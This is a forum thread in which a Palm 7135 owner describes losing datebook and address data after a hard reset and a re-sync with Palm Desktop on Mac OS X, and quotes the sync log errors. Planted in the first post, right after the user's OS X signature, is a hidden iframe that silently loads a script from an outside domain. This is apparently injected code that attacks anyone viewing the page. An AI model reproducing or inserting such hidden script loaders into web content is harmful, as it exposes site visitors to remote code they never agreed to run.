+ Reply to Thread

Hard Reset>Sync>No Data!

Okay, I had to do a hard reset after installing a program that didn't agree with my 7135 (see "apps that don't work" thread). I also had to wait for my husband's phone to arrive today, since the disk that came with mine was defective, and I was having only sporadic success in syncing with the Palm Desktop I d/l'ed from palm.com--but I HAD synced just before installing the fatal app.

Today I installed the Desktop software from the disk, did a sync, and all my 3rd party apps are back--just NO DATA in the datebook or address file!! (Insert shrieking SFX from "Psycho" here) I now have multiple user data files and user data archives (marked "old," "old old," etc.) I have clearly done something wrong, probably something stupid. Can anyone help?

Laurie
    OS X (10.2.3)<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

The Nightmare Continues . . .

I have been able to recover the data so it is visible on my Mac. Here is what shows up in the log after I sync:

Loading “Datebook Conduit”
    Conduit “Date Book” version 3.0.0
    Sync type is Fast
    Remote database 1 name is DatebookDB
    Date Book could not open the Palm Desktop file “User Data” because of a system error.
    Date Book synchronization failed
    “Date Book” failed (error = #4100)
    Loading “Address Conduit”
    Conduit “Address Book” version 3.0.0
    Sync type is Fast
    Remote database 1 name is AddressDB
    Address Book could not open the Palm Desktop file “User Data” because of a system error.
    Address Book synchronization failed
    “Address Book” failed (error = #4100)

Ditto ToDo List and Memo Pad

Has this happened to anyone else?